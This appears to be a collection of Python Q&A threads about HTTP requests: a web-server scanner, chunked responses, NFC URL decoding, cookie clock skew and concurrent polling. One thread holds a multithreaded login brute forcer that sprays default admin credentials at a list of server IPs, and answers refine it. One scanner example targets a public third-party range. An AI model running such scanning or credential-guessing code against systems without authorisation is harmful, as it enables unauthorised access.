HTTP checks in Python

Learning Python here. I want to check if anybody is running a web server on my local
network, using this code, but it gives me a lot of errors in the console.
#!/usr/bin/env python
import httplib

last = 1
while last <> 255:
    url = "10.1.1." + "last"
    connection = httplib.HTTPConnection("url", 80)
    connection.request("GET", "/")
    response = connection.getresponse()
    print (response.status)
    last = last + 1

I do suggest changing the while loop to the more idiomatic for loop, and handling exceptions:
#!/usr/bin/env python
import httplib
import socket

for i in range(1, 256):
    try:
        url = "10.1.1.%d" % i
        connection = httplib.HTTPConnection(url, 80)
        connection.request("GET", "/")
        response = connection.getresponse()
        print url + ":", response.status
    except socket.error:
        print url + ":", "error!"
To see how to add a timeout to this, so it doesn't take so long to check each server, see here.
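For example, HTTPConnection accepts a timeout keyword argument (Python 2.6+); a minimal sketch of one probe with a two-second limit:

import httplib
import socket

# A short timeout keeps unreachable hosts from blocking the scan for long.
connection = httplib.HTTPConnection("10.1.1.1", 80, timeout=2)
try:
    connection.request("GET", "/")
    print "10.1.1.1:", connection.getresponse().status
except (socket.timeout, socket.error):
    # no server, connection refused, or too slow to answer
    print "10.1.1.1:", "error!"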

As pointed out, you have some basic quotation issues. But more fundamentally:

1. You're not using Pythonic constructs to handle things; you're coding them as plain imperative code. That's fine, of course, but below are examples of better (and more fun) ways to express things.
2. You need to explicitly set timeouts, or the scan will take forever.
3. You need to multithread, or the scan will take forever.
4. You need to handle various common exception types, or your code will crash: connections will fail (including timing out) under numerous conditions against real web servers.
5. 10.1.1.* is only one possible set of "local" servers. RFC 1918 spells out that the "local" ranges are 10.0.0.0 - 10.255.255.255, 172.16.0.0 - 172.31.255.255, and 192.168.0.0 - 192.168.255.255. The problem of generic detection of responders in your "local" network is a hard one.
6. Web servers (especially local ones) often run on ports other than 80 (notably 8000, 8001, or 8080).
7. The complexity of general web servers, DNS, etc. is such that you can get various timeout behaviors at different times (and affected by recent operations).

Below is some sample code to get you started; it pretty much addresses all of the above problems except (5), which I'll assume is (well) beyond the scope of the question.
BTW, I'm printing the size of the returned web page, since it's a simple "signature" of what the page is. The sample IPs return various Yahoo assets.
import urllib
import threading
import socket

def t_run(thread_list, chunks):
    t_count = len(thread_list)
    print "Running %s jobs in groups of %s threads" % (t_count, chunks)
    for x in range(t_count / chunks + 1):
        i = x * chunks
        i_c = min(i + chunks, t_count)
        c = len([t.start() for t in thread_list[i:i_c]])
        print "Started %s threads for jobs %s...%s" % (c, i, i_c - 1)
        c = len([t.join() for t in thread_list[i:i_c]])
        print "Finished %s threads for job index %s" % (c, i)

def url_scan(ip_base, timeout=5):
    socket.setdefaulttimeout(timeout)
    def f(url):
        # print "-- Trying (%s)" % url
        try:
            # the print will only complete if there's a server there
            r = urllib.urlopen(url)
            if r:
                print "## (%s) got %s bytes" % (url, len(r.read()))
            else:
                print "## (%s) failed to connect" % url
        except IOError, msg:
            # these are just the common cases
            if str(msg) == "[Errno socket error] timed out":
                return
            if str(msg) == "[Errno socket error] (10061, 'Connection refused')":
                return
            print "## (%s) got error '%s'" % (url, msg)
    # you might want 8000 and 8001, too
    return [threading.Thread(target=f,
                             args=("http://" + ip_base + str(x) + ":" + str(p),))
            for x in range(255) for p in [80, 8080]]

# run them (increase chunk size depending on your memory)
# also, try different timeouts
t_run(url_scan("209.131.36."), 100)
t_run(url_scan("209.131.36.", 30), 100)
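If you are on Python 3, the same idea (bounded concurrency, short timeouts, page size as a "signature") can be sketched with concurrent.futures and urllib.request; treat this as an illustration of the approach above, not a drop-in replacement:

# Python 3 sketch: bounded thread pool, short timeout,
# print a size "signature" for each responding host.
import urllib.request
import urllib.error
import socket
from concurrent.futures import ThreadPoolExecutor

def probe(url, timeout=5):
    try:
        with urllib.request.urlopen(url, timeout=timeout) as r:
            print("## (%s) got %s bytes" % (url, len(r.read())))
    except (urllib.error.URLError, socket.timeout):
        pass  # no server, refused, or too slow

urls = ["http://10.1.1.%d:%d" % (x, p)
        for x in range(1, 255) for p in (80, 8080)]
with ThreadPoolExecutor(max_workers=100) as pool:
    pool.map(probe, urls)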

Remove the quotes from the variable names last and url. Python is interpreting them as strings rather than variables. Try this:
#!/usr/bin/env python
import httplib

last = 1
while last <> 255:
    url = "10.1.1.%d" % last
    connection = httplib.HTTPConnection(url, 80)
    connection.request("GET", "/")
    response = connection.getresponse()
    print (response.status)
    last = last + 1
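As a side note, if you later move this to Python 3, the <> operator is gone (use !=) and httplib is renamed http.client; a rough Python 3 sketch of the same loop:

import http.client

for last in range(1, 255):
    url = "10.1.1.%d" % last
    try:
        connection = http.client.HTTPConnection(url, 80, timeout=2)
        connection.request("GET", "/")
        print(url + ":", connection.getresponse().status)
    except OSError:
        # covers refused connections and timeouts in Python 3
        print(url + ":", "error!")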

You're trying to connect to a URL that is literally the string 'url': that's what the quotes you're using in
connection = httplib.HTTPConnection("url", 80)
mean. Once you remedy that (by removing those quotes) you'll be trying to connect to "10.1.1.last", given the quotes in the previous line. Set that line to
url = "10.1.1." + str(last)
and it could work!-)

Related

Stop multiprocessing from going through entire list for function for bruteforcer

I am trying to make a brute forcer for my ethical hacking class using multiprocessing. I want it to iterate through the list of server IPs and try one login for each of them, but it prints every single IP before trying to make connections; then, once all the IPs have been printed, it starts trying to make connections, prints a couple more IPs, tries another connection, and so on.
I just want it to iterate through the list of IPs and try to connect to each one, one process per connection, with about 20 processes at a time.
import threading, requests, time, os, multiprocessing

global count2

login_list=[{"username":"admin","password":"Password1"}]

with open('Servers.txt') as f:
    lines = [line.rstrip() for line in f]

count=[]
for number in range(len(lines)):
    count.append(number)
count2 = count

def login(n):
    try:
        url = 'http://'+lines[n]+'/api/auth'
        print(url)
        if '/#!/init/admin' in url:
            print('[~] Admin panel detected, saving url and moving to next...')
        x = requests.post(url, json = login_list)
        if x.status_code == 422:
            print('[-] Failed to connect, trying again...')
            print(n)
        if x.status_code == 403:
            print('[!] 403 Forbidden, "Access denied to resource", Possibly to many tries. Trying again in 20 seconds')
            time.sleep(20)
            print(n)
        if x.status_code == 200:
            print('\n[~] Connection successful! Login to '+url+' saved.\n')
            print(n)
    except:
        print('[#] No more logins to try for '+url+' moving to next server...')
        print('--------------')

if __name__ == "__main__":
    # creating a pool object
    p = multiprocessing.Pool()
    # map list to target function
    result = p.map(login, count2)
An example of the Servers.txt file:
83.88.223.86:9000
75.37.144.153:9000
138.244.6.184:9000
34.228.116.82:9000
125.209.107.178:9000
33.9.12.53:9000
Those are not real IP addresses.
I think you're confused about how the multiprocessing map function passes values to the worker processes. Perhaps this will make matters clearer:
from multiprocessing import Pool
import requests
import sys
from requests.exceptions import HTTPError, ConnectionError

IPLIST = ['83.88.223.86:9000',
          '75.37.144.153:9000',
          '138.244.6.184:9000',
          '34.228.116.82:9000',
          '125.209.107.178:9000',
          '33.9.12.53:9000',
          'www.google.com']

PARAMS = {'username': 'admin', 'password': 'passw0rd'}

def err(msg):
    print(msg, file=sys.stderr)

def process(ip):
    with requests.Session() as session:
        url = f'http://{ip}/api/auth'
        try:
            (r := session.post(url, json=PARAMS, timeout=1)).raise_for_status()
        except ConnectionError:
            err(f'Unable to connect to {url}')
        except HTTPError:
            err(f'HTTP {r.status_code} for {url}')
        except Exception as e:
            err(f'Unexpected exception {e}')

def main():
    with Pool() as pool:
        pool.map(process, IPLIST)

if __name__ == '__main__':
    main()
Additional notes: You probably want to specify a timeout, otherwise unreachable addresses will take a long time to process. Also review the exception handling.
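If you do want automatic retries with explicit control, one common pattern is to mount an HTTPAdapter with a urllib3 Retry policy on the session. A sketch (the numbers are arbitrary, and with this configuration only connection-level failures are retried, not HTTP error statuses):

import requests
from requests.adapters import HTTPAdapter
from urllib3.util.retry import Retry

session = requests.Session()
# Retry failed connection attempts twice with a small backoff.
adapter = HTTPAdapter(max_retries=Retry(total=2, backoff_factor=0.5))
session.mount('http://', adapter)
session.mount('https://', adapter)
# The timeout still has to be passed per request.
r = session.post('http://83.88.223.86:9000/api/auth', json=PARAMS, timeout=1)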
The first thing I would mention is that this is a job better suited to multithreading, since login is mostly waiting for network requests to complete and it is far more efficient to create threads than processes. In fact, you should create a thread pool whose size equals the number of URLs you will be posting to, up to a maximum of, say, 1000 (and you would not want to create a multiprocessing pool of that size).
Second, when you are doing multiprocessing or multithreading, your worker function (login in this case) processes a single element of the iterable passed to the map function. I think you get that. But instead of passing map the list of servers, you are passing a list of numbers (indices), and then login uses each index to look up the server in the lines list. That is rather indirect. Also, building the list of indices could have been simplified to one line: count2 = list(range(len(lines))), or really just count2 = range(len(lines)) (you don't need a list).
Third, your code says it is retrying certain errors, but there is actually no logic to do so.
import requests
from multiprocessing.pool import ThreadPool
from functools import partial
import time

# This must be a dict not a list:
login_params = {"username": "admin", "password": "Password1"}

with open('Servers.txt') as f:
    servers = [line.rstrip() for line in f]

def login(session, server):
    url = f'http://{server}/api/auth'
    print(url)
    if '/#!/init/admin' in url:
        print(f'[~] Admin panel detected, saving {url} and moving to next...')
        # To move on to the next, you simply return
        # because you are through with this URL:
        return
    try:
        for retry_count in range(1, 4):  # will retry up to 3 times certain errors:
            r = session.post(url, json=login_params)
            if retry_count == 3:
                # This was the last try:
                break
            if r.status_code == 422:
                print(f'[-] Failed to connect to {url}, trying again...')
            elif r.status_code == 403:
                print(f'[!] 403 Forbidden, "Access denied to resource", Possibly to many tries. Trying {url} again in 20 seconds')
                time.sleep(20)
            else:
                break  # not something we retry
        r.raise_for_status()  # test status code
    except Exception as e:
        print('Got exception: ', e)
    else:
        print(f'\n[~] Connection successful! Login to {url} saved.\n')

if __name__ == "__main__":
    # creating a pool object
    with ThreadPool(min(len(servers), 1000)) as pool, \
            requests.Session() as session:
        # map will return list of None since `login` returns None implicitly:
        pool.map(partial(login, session), servers)

Python3 ThreadingHTTPServer fails to send chunked encoded response

I'm implementing a simple reverse proxy in Python 3 and I need to send a response with chunked transfer-encoding.
I've taken my cues from this post, but I have some problems when sending the chunks in the format described here.
If I send chunks of length <= 9 bytes, the message is received correctly by the client. When sending chunks of length >= 10 bytes, however, it seems that some of them are not received, and the client remains stuck waiting indefinitely.
Here is an example of non working code:
from http.server import BaseHTTPRequestHandler, ThreadingHTTPServer

class ProxyHTTPRequestHandler(BaseHTTPRequestHandler):
    protocol_version = 'HTTP/1.1'

    def do_GET(self, body=True):
        # HTTP 200 + minimal HTTP headers in response
        self.send_response(200)
        self.send_header('transfer-encoding', 'chunked')
        self.send_header('Content-Type', 'text/plain')
        self.end_headers()

        # writing 5 chunks of 10 characters
        for i in range(5):
            text = str(i+1) * 10  # concatenate 10 chars
            chunk = '{0:d}\r\n'.format(len(text)) + text + '\r\n'
            self.wfile.write(chunk.encode(encoding='utf-8'))

        # writing close sequence
        close_chunk = '0\r\n\r\n'
        self.wfile.write(close_chunk.encode(encoding='utf-8'))

def main():
    try:
        server_address = ('127.0.0.1', 8099)
        # I use ThreadingHTTPServer but the problem persists also with HTTPServer
        httpd = ThreadingHTTPServer(server_address, ProxyHTTPRequestHandler)
        print('http server is running')
        httpd.serve_forever()
    except KeyboardInterrupt:
        print(" ^C entered, stopping web server...")
        httpd.socket.close()

if __name__ == '__main__':
    main()
In this case, after several seconds, and only if I manually stop the Python execution, Postman shows the response with the "2222222222" chunk missing.
But if I use this length instead:
# writing the same 5 chunks of 9 characters
for i in range(5):
    text = str(i+1) * 9  # concatenate 9 chars
    chunk = '{0:d}\r\n'.format(len(text)) + text + '\r\n'
    self.wfile.write(chunk.encode(encoding='utf-8'))

# writing close sequence
close_chunk = '0\r\n\r\n'
self.wfile.write(close_chunk.encode(encoding='utf-8'))
The communication ends correctly (after 6 ms all 5 chunks are interpreted correctly).
Some version information:
HTTP Client: Postman 8.10
(venv) manuel@MBP ReverseProxy % python -V
Python 3.9.2
(venv) manuel@MBP ReverseProxy % pip freeze
certifi==2021.10.8
charset-normalizer==2.0.6
idna==3.2
requests==2.26.0
urllib3==1.26.7
Thanks in advance for any hints!
I am posting the solution (thanks to Martin Panter from bugs.python.org) in case anyone else has the same problem in the future.
The behaviour was caused by the chunk size, which must be written in hex format, not decimal. That also explains the 9-vs-10 byte threshold: a decimal "10" is parsed by the client as hex 0x10 = 16 bytes, so it keeps waiting for bytes that never arrive.
Unfortunately the Mozilla docs do not specify the format, and their example only used lengths < 10. A formal definition is found here.
In conclusion, the working version is the following (using {0:x} instead of {0:d})
# writing the same 5 chunks of 9 characters
for i in range(5):
    text = str(i+1) * 9  # concatenate 9 chars
    chunk = '{0:x}\r\n'.format(len(text)) + text + '\r\n'
    self.wfile.write(chunk.encode(encoding='utf-8'))

# writing close sequence
close_chunk = '0\r\n\r\n'
self.wfile.write(close_chunk.encode(encoding='utf-8'))
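If chunks are written in more than one place, a tiny helper keeps the hex-length framing in one spot (write_chunk and end_chunks are just names chosen here, not part of http.server):

def write_chunk(wfile, data):
    # One chunk is: <size in hex>\r\n<payload bytes>\r\n
    wfile.write(b'%x\r\n' % len(data))
    wfile.write(data + b'\r\n')

def end_chunks(wfile):
    # The terminating chunk: size 0, empty payload, final CRLF.
    wfile.write(b'0\r\n\r\n')

Inside do_GET this becomes write_chunk(self.wfile, text.encode('utf-8')) per piece, followed by one end_chunks(self.wfile) at the end.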

nfcpy retrieves the URL from a NFC tag. But how do I open the link?

What I want:
I want my Raspberry Pi to act as an NFC reader that can trigger the URL record from an NFC tag.
My setup is a Raspberry Pi with a PN532 NFC HAT and nfcpy. I am using the example tagtool.py, and right now I am able to scan the NFC tag and then show the URL (+ some extra data).
But I want the system to run the URL which triggers a webhook on IFTTT (which then triggers a playlist on Spotify...)
What I have done so far:
I have used setup.py to install nfcpy and experimented a bit with the commands. But when I run the command
python3 tagtool.py --device tty:S0:pn532 -d nfc.ndef.UriRecord -l
It first returns this
[main] enable debug output for 'nfc.ndef.UriRecord'
[nfc.clf] searching for reader on path tty:S0:pn532
[nfc.clf] using PN532v1.6 at /dev/ttyS0
** waiting for a tag **
and then, when I scan one of my NFC tags (which has a URL in its URI record) with the reader, I get this message.
Type2Tag 'NXP NTAG213' ID=04EA530A3E4D80
NDEF Capabilities:
readable = yes
writeable = yes
capacity = 137 byte
message = 67 byte
NDEF Message:
record 1
type = 'urn:nfc:wkt:U'
name = ''
data = b'\x04maker.ifttt.com/trigger/Playlist_022/with/key/bVTin_XXEEEDDDDEEEEEE'
[main] *** RESTART ***
[nfc.clf] searching for reader on path tty:S0:pn532
[nfc.clf] using PN532v1.6 at /dev/ttyS0
** waiting for a tag **
As you can see, the URL is right there under data (with a leading b'\x04' and without https://, but I guess that's quite easy to change). So basically I just need to trigger it.
I read somewhere that I could use curlify so I have used the command 'pip3 install curlify' and made some changes to tagtool.py.
The original tagtool.py (which I believe is the most important part for what I am trying to do) looks like this
if tag.ndef:
    print("NDEF Capabilities:")
    print(" readable = %s" % ("no", "yes")[tag.ndef.is_readable])
    print(" writeable = %s" % ("no", "yes")[tag.ndef.is_writeable])
    print(" capacity = %d byte" % tag.ndef.capacity)
    print(" message = %d byte" % tag.ndef.length)
    if tag.ndef.length > 0:
        print("NDEF Message:")
        for i, record in enumerate(tag.ndef.records):
            print("record", i + 1)
            print(" type =", repr(record.type))
            print(" name =", repr(record.name))
            print(" data =", repr(record.data))
In the new tagtool2.py I have added this to the start of the document
import curlify
import requests
And then I have added these lines
response = requests.get("https://repr(record.data)")
print(curlify.to_curl(response.request))
Which means it looks like this. And this is probably wrong in several ways:
if tag.ndef:
    print("NDEF Capabilities:")
    print(" readable = %s" % ("no", "yes")[tag.ndef.is_readable])
    print(" writeable = %s" % ("no", "yes")[tag.ndef.is_writeable])
    print(" capacity = %d byte" % tag.ndef.capacity)
    print(" message = %d byte" % tag.ndef.length)
    if tag.ndef.length > 0:
        print("NDEF Message:")
        for i, record in enumerate(tag.ndef.records):
            print("record", i + 1)
            print(" type =", repr(record.type))
            print(" name =", repr(record.name))
            print(" data =", repr(record.data))
            response = requests.get("https://repr(record.data)")
            print(curlify.to_curl(response.request))
Because when I try to trigger the URL with a NFC tag I get this message:
Type2Tag 'NXP NTAG213' ID=04EA530A3E4D80
NDEF Message:
record 1
type = 'urn:nfc:wkt:U'
name = ''
data = b'\x04maker.ifttt.com/trigger/Metal1/with/key/bVTin_XXEEEDDDDEEEEEE'
[urllib3.connectionpool] Starting new HTTPS connection (1): repr(record.data):443
[nfc.clf] HTTPSConnectionPool(host='repr(record.data)', port=443): Max retries exceeded with url: / (Caused by NewConnectionError('<urllib3.connection.VerifiedHTTPSConnection object at 0xb579a650>: Failed to establish a new connection: [Errno -2] Name or service not known'))
Can anyone tell me what I am doing wrong? And if curlify is the right way to go?
What you are doing wrong is that the data stored in the NDEF message is encoded; you cannot just open a connection using the raw data, you have to decode it first using the correct record type (the encoded value has a hex number in it).
It is also encoded in UTF-8, so Python treats it as bytes, not as a string object.
The type says it is a URI record, which matches what you asked for with 'nfc.ndef.UriRecord' (not sure why the output calls it urn instead).
The hex number \x04 means https://
Unfortunately I don't think anybody has written a decoder method for the NFC URI specification, only encoders.
Here is a link to the full spec for the NDEF URI record type.
Once you have replaced the hex character in the data with the correct decoded value, you will get the URL https://maker.ifttt.com/trigger/Metal1/with/key/bVTin_XXEEEDDDDEEEEEE
A simple example (where a stores the value instead of record.data):

import re
import requests

a = b'\x04maker.ifttt.com/trigger/Metal1/with/key/bVTin_XXEEEDDDDEEEEEE'
a_text = a.decode('utf-8')
x = re.sub('\x04', 'https://', a_text)
print(x)
requests.get(x)
Then you can use requests.get() on the decoded value
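If you want something more general than replacing \x04, the URI record spec defines a one-byte prefix code; a small lookup-based decoder sketch (the table here is abbreviated to the most common codes, and decode_uri_record is just a name chosen for illustration):

# Abbreviated prefix table from the NFC Forum URI Record Type Definition.
URI_PREFIXES = {
    0x00: '',
    0x01: 'http://www.',
    0x02: 'https://www.',
    0x03: 'http://',
    0x04: 'https://',
}

def decode_uri_record(data):
    # First byte selects the prefix, the rest is the UTF-8 encoded remainder.
    return URI_PREFIXES.get(data[0], '') + data[1:].decode('utf-8')

print(decode_uri_record(b'\x04maker.ifttt.com/trigger/Metal1/with/key/bVTin_XXEEEDDDDEEEEEE'))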
This turned out to be the simple but good solution for my needs.
if tag.ndef:
    if tag.ndef.length > 0:
        # print("NDEF Message:")
        for i, record in enumerate(tag.ndef.records):
            print(record.uri)
            response = requests.get(record.uri)
            print(curlify.to_curl(response.request))
I started out with a way more complicated solution. I am keeping it here in case anybody runs into similar problems.
Since the first take, I have cleaned out some of the print() lines, and I know I could clean out some more, but I am keeping them here to make it easier to see what's happening.
It's especially worth noticing the y variable. I was left with an almost perfect URL, but I kept getting errors because of an extra ' at the end of the URL.
if tag.ndef:
    if tag.ndef.length > 0:
        for i, record in enumerate(tag.ndef.records):
            print(repr(record.data))
            print(str(record.data))
            org_string = str(record.data)
            mod_string = org_string[6:]
            y = mod_string.rstrip(mod_string[-1])
            w = "https://"
            print(mod_string)
            print(y)
            print(w)
            response = requests.get(w + y)
            print(curlify.to_curl(response.request))
The code can be improved, but it works; it gives me the message below and, more importantly, it triggers the URL on the NFC tag (I have scrambled the IFTTT webhook key).
Type2Tag 'NXP NTAG215' ID=04722801E14103
b'\x04maker.ifttt.com/trigger/python_test/with/key/bEDoi_gUT5x5uDsdsaR3Ao'
b'\x04maker.ifttt.com/trigger/python_test/with/key/bEDoi_gUT5x5uDsdsaR3Aoo'
maker.ifttt.com/trigger/python_test/with/key/bEDoi_gUT5x5uDsdsaR3Ao'
maker.ifttt.com/trigger/python_test/with/key/bEDoi_gUT5x5uDsdsaR3Ao
https://
[urllib3.connectionpool] Starting new HTTPS connection (1): maker.ifttt.com:443
[urllib3.connectionpool] https://maker.ifttt.com:443 "GET maker.ifttt.com/trigger/python_test/with/key/bEDoi_gUT5x5uDsdsaR3Ao HTTP/1.1" 200 69
curl -X GET -H 'Accept: */*' -H 'Accept-Encoding: gzip, deflate' -H 'Connection: keep-alive' -H 'User-Agent: python-requests/2.21.0' https://maker.ifttt.com/trigger/python_test/with/key/bEDoi_gUT5x5uDsdsaR3Ao
[main] *** RESTART ***
[nfc.clf] searching for reader on path tty:S0:pn532
[nfc.clf] using PN532v1.6 at /dev/ttyS0
** waiting for a tag **

Python Cookielib with HTTP Servers that Have Incorrect Date / Timezone Set

I am using python and cookielib to talk to an HTTP server that has its date incorrectly set. I have no control over this server, so fixing its time is not a possibility. Unfortunately, the server's incorrect time messes up cookielib because the cookies appear to be expired.
Interestingly, if I go to the same website with any web browser, the browser accepts the cookie and it gets saved. I assume that modern web browsers come across misconfigured web servers all the time, see that the Date header is set incorrectly, and adjust cookie expiration dates accordingly.
Has anyone come across this problem before? Is there any way of handling it within Python?
I hacked together a solution that involves live monkey-patching of cookielib. Definitely not ideal, but if others find a better way, please let me know:
import threading
import time
import logging
import urllib2
import cookielib

cook_proc = urllib2.HTTPCookieProcessor(cookielib.LWPCookieJar())
cookie_processing_lock = threading.Lock()

def _process_cookies(request, response):
    '''Process cookies, but do so in a way that can handle servers with bad
    clocks set.'''
    # We do some real monkey hacking here, so put it in a lock.
    with cookie_processing_lock:
        # Get the server date.
        date_header = cookielib.http2time(
            response.info().getheader('Date') or '')
        # Save the old cookie parsing function.
        orig_parse = cookielib.parse_ns_headers
        # If the server date is off by more than an hour, we'll adjust it.
        if date_header:
            off_by = time.time() - date_header
            if abs(off_by) > 3600:
                logging.warning("Server off %.1f hrs." % (abs(off_by)/3600))
                # Create our monkey-patched parser.
                def hacked_parse(ns_headers):
                    try:
                        results = orig_parse(ns_headers)
                        for r in results:
                            for r_i, (key, val) in enumerate(r):
                                if key == 'expires':
                                    r[r_i] = key, val + off_by
                                    logging.info("Fixing bad cookie "
                                                 "expiration time for: %s" % r[0][0])
                        logging.info("COOKIE RESULTS: %s", results)
                        return results
                    except Exception as e:
                        logging.error("Problem parsing cookie: %s" % e)
                        raise
                cookielib.parse_ns_headers = hacked_parse
        response = cook_proc.http_response(request, response)
        # Make sure we set the cookie parser back.
        cookielib.parse_ns_headers = orig_parse
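For what it's worth, a rough usage sketch (the URL is a placeholder): open the request with a plain opener, then run the response through _process_cookies by hand so the jar gets the clock-corrected cookies.

# Usage sketch: no HTTPCookieProcessor on the opener itself; cookies are
# extracted (with corrected expiry) only via _process_cookies.
opener = urllib2.build_opener()
request = urllib2.Request("http://server-with-bad-clock.example.com/")
response = opener.open(request)
_process_cookies(request, response)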

Multiple simultaneous HTTP requests

I'm trying to take a list of items and check for their status change based on certain processing by the API. The list will be manually populated and can vary in number up to several thousand.
I'm trying to write a script that makes multiple simultaneous connections to the API to keep checking for the status change. For each item, once the status changes, the attempts to check must stop. Based on reading other posts on Stack Overflow (specifically, What is the fastest way to send 100,000 HTTP requests in Python?), I've come up with the following code. But the script always stops after processing the list once. What am I doing wrong?
One additional issue I'm facing is that the keyboard interrupt never fires (I'm trying with Ctrl+C, but it does not kill the script).
from urlparse import urlparse
from threading import Thread
import httplib, sys
from Queue import Queue

requestURLBase = "https://example.com/api"
apiKey = "123456"

concurrent = 200
keepTrying = 1

def doWork():
    while keepTrying == 1:
        url = q.get()
        status, body, url = checkStatus(url)
        checkResult(status, body, url)
        q.task_done()

def checkStatus(ourl):
    try:
        url = urlparse(ourl)
        conn = httplib.HTTPConnection(requestURLBase)
        conn.request("GET", url.path)
        res = conn.getresponse()
        respBody = res.read()
        conn.close()
        return res.status, respBody, ourl  # Status can be 210 for error or 300 for successful API response
    except:
        print "ErrorBlock"
        print res.read()
        conn.close()
        return "error", "error", ourl

def checkResult(status, body, url):
    if "unavailable" not in body:
        print status, body, url
        keepTrying = 1
    else:
        keepTrying = 0

q = Queue(concurrent * 2)
for i in range(concurrent):
    t = Thread(target=doWork)
    t.daemon = True
    t.start()

try:
    for value in open('valuelist.txt'):
        fullUrl = requestURLBase + "?key=" + apiKey + "&value=" + value.strip() + "&years="
        print fullUrl
        q.put(fullUrl)
    q.join()
except KeyboardInterrupt:
    sys.exit(1)
I'm new to Python so there could be syntax errors as well... I'm definitely not familiar with multi-threading so perhaps I'm doing something else wrong as well.
In the code, the list is only read once. Should be something like
try:
    while True:
        for value in open('valuelist.txt'):
            fullUrl = requestURLBase + "?key=" + apiKey + "&value=" + value.strip() + "&years="
            print fullUrl
            q.put(fullUrl)
        q.join()
For the interrupt issue, remove the bare except line in checkStatus or make it except Exception. Bare excepts catch all exceptions, including SystemExit (which is what sys.exit raises), and stop the Python process from terminating.
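For example, checkStatus could be reworked like this (a sketch; same logic, narrower handler):

def checkStatus(ourl):
    try:
        url = urlparse(ourl)
        conn = httplib.HTTPConnection(requestURLBase)
        conn.request("GET", url.path)
        res = conn.getresponse()
        respBody = res.read()
        conn.close()
        return res.status, respBody, ourl
    except Exception as e:
        # Exception does not cover SystemExit or KeyboardInterrupt,
        # so sys.exit() and Ctrl+C are no longer swallowed here.
        print "ErrorBlock:", e
        return "error", "error", ourl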
If I may make a couple of general comments, though:

Threading is not a good implementation for such large concurrencies.
Creating a new connection every time is not efficient.

What I would suggest is:

Use gevent for asynchronous network I/O (see the sketch below).
Pre-allocate a queue of connections the same size as the concurrency number, and have checkStatus grab a connection object whenever it needs to make a call. That way the connections stay alive and get reused, and there is no overhead in creating and destroying them (or the increased memory use that goes with it).
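A rough sketch of the gevent part (an illustration only; it assumes gevent is installed, uses requests just to keep the sketch short, and reuses the URL construction from the original script):

# Sketch: monkey-patch the socket module so blocking I/O cooperates,
# then run the checks on a greenlet pool instead of OS threads.
from gevent import monkey; monkey.patch_all()
import gevent.pool
import requests

requestURLBase = "https://example.com/api"  # as in the original script
apiKey = "123456"
pool = gevent.pool.Pool(200)  # same size as `concurrent` above

def check(url):
    try:
        r = requests.get(url, timeout=5)
        return r.status_code, r.text, url
    except requests.RequestException:
        return "error", "error", url

urls = [requestURLBase + "?key=" + apiKey + "&value=" + value.strip() + "&years="
        for value in open('valuelist.txt')]
for status, body, url in pool.imap_unordered(check, urls):
    print status, url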
